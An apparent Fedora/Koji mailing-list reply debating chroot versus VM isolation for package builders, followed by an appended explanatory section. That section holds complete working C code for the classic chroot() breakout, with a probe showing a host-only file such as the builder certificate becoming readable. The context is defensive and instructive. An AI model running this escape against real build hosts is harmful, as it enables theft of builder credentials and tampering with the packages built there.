<div dir="ltr">On Tue, Sep 3, 2013 at 3:10 PM, Jay Greguske <span dir="ltr"><<a href="mailto:jgregusk@redhat.com" target="_blank">jgregusk@redhat.com</a>></span> wrote:<br><div class="gmail_extra"><div class="gmail_quote">
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">On 09/02/2013 04:29 AM, Miroslav Suchý wrote:<br>
> On 08/30/2013 10:01 PM, Jay Greguske wrote:<br>
>> I'd like to see some elaboration on why VMs instead of chroots would be<br>
>> required. I can draw my own conclusions (security) but I'd like to see<br>
>> them listed out first before continuing the discussion.<br>
><br>
> Koji builder has a certificate stored somewhere. This certificate<br>
> authorizes him to the Koji hub.<br>
> Whoever has this certificate can act as the Koji builder.<br>
> Koji builder builds using mock, which means in a chroot. There are some<br>
> known exploits which allow you to break out of chroots.<br>
><br>
> Now imagine an evil package which will break out of the chroot, read that<br>
> certificate and deliver it to the attacker.<br>
> He can now build an evil builder and start building modified packages.<br>
><br>
> While there are known exploits that affect the host machine of a VM, it is<br>
> definitely harder than breaking out of a chroot.<br>
><br>
<br>
If we had SELinux policy enabled on the builders and used MLS on the<br>
chroots, that would mitigate chroot-to-chroot attacks. I'm not sure if<br>
policy could prevent a chroot'ed process from getting access to the<br>
builder's certificate. If it could, I think getting SELinux working on<br>
the builders would be an easier path than re-writing koji to use VMs.<br>
<br>
Maybe someone with more expertise could comment on the latter issue.<br>
</blockquote><div><br></div><div>koji already uses VMs for x86.<br><br>Peter <br></div></div><br></div></div>
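<p>The "known exploits which allow you to break out of chroots" that Miroslav refers to are, in the simplest case, not exploits of a bug at all but a property of chroot(2): a process that can call chroot() again can leave. The program below is an added example, not code from this thread or from Koji or mock, showing the classic breakout. It assumes the chrooted process holds CAP_SYS_CHROOT (in a mock build that is the case while build dependencies and their scriptlets are being installed as root inside the chroot); an unprivileged process gets EPERM from chroot() and this technique does not apply. The scratch directory name and the optional probe path on the command line are assumptions for the demo.</p>

```c
/* Classic chroot() breakout.  Added example, not from the thread or from
 * Koji/mock.  Only works with CAP_SYS_CHROOT (root inside the chroot). */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int chroot(const char *path);   /* compatible prototype in case unistd.h hides it */

/* 1 if both paths name the same directory (same device and inode),
 * 0 if not, -1 if either stat() fails. */
int same_dir(const char *a, const char *b)
{
    struct stat sa, sb;
    if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
        return -1;
    return (sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino) ? 1 : 0;
}

/* chdir("..") until "." stops changing, i.e. until we reach whatever the
 * kernel currently treats as the top of the tree for this process.
 * Returns the number of steps taken, or -1 on error. */
int climb_to_top(int max_steps)
{
    struct stat prev, cur;
    int steps = 0;

    if (stat(".", &prev) != 0)
        return -1;
    while (steps < max_steps) {
        if (chdir("..") != 0 || stat(".", &cur) != 0)
            return -1;
        steps++;
        if (cur.st_dev == prev.st_dev && cur.st_ino == prev.st_ino)
            break;              /* ".." == ".": nothing above us */
        prev = cur;
    }
    return steps;
}

/* The breakout.  After chroot(scratch) the cwd is deliberately left where it
 * was, which is now *outside* the new root, so the kernel does not clamp ".."
 * and climb_to_top() walks up to the host's real "/".  A final chroot(".")
 * makes that the process root.  Returns 0 on success, -1 with errno set. */
int escape_chroot(const char *scratch)
{
    if (mkdir(scratch, 0700) != 0 && errno != EEXIST)
        return -1;
    if (chroot(scratch) != 0)   /* EPERM without CAP_SYS_CHROOT */
        return -1;
    if (climb_to_top(4096) < 0)
        return -1;
    if (chroot(".") != 0)
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    /* argv[1] (assumed, optional): a host path that should not be visible
     * from inside the chroot, e.g. the builder's client certificate. */
    const char *probe = argc > 1 ? argv[1] : NULL;

    if (probe)
        printf("before: %s is %s\n", probe,
               access(probe, R_OK) == 0 ? "readable" : "not visible");
    if (escape_chroot("breakout.tmp") != 0) {
        printf("escape failed: %s\n", strerror(errno));
        return 1;
    }
    printf("escaped: \".\" is now the host root: %s\n",
           same_dir(".", "/") == 1 ? "yes" : "no");
    if (probe)
        printf("after:  %s is %s\n", probe,
               access(probe, R_OK) == 0 ? "readable" : "not visible");
    return 0;
}
```

<p>Run it as root inside a chroot with the path of a file that exists only on the host; before the escape access() fails, afterwards it succeeds, which is exactly the certificate-theft path Miroslav describes. Note what the breakout does and does not give you: it changes the process's root, not its security context, so a confined SELinux domain (the MLS scheme Jay suggests) still governs which files the escaped process may read, while a VM boundary would have to be crossed by a real hypervisor bug.</p>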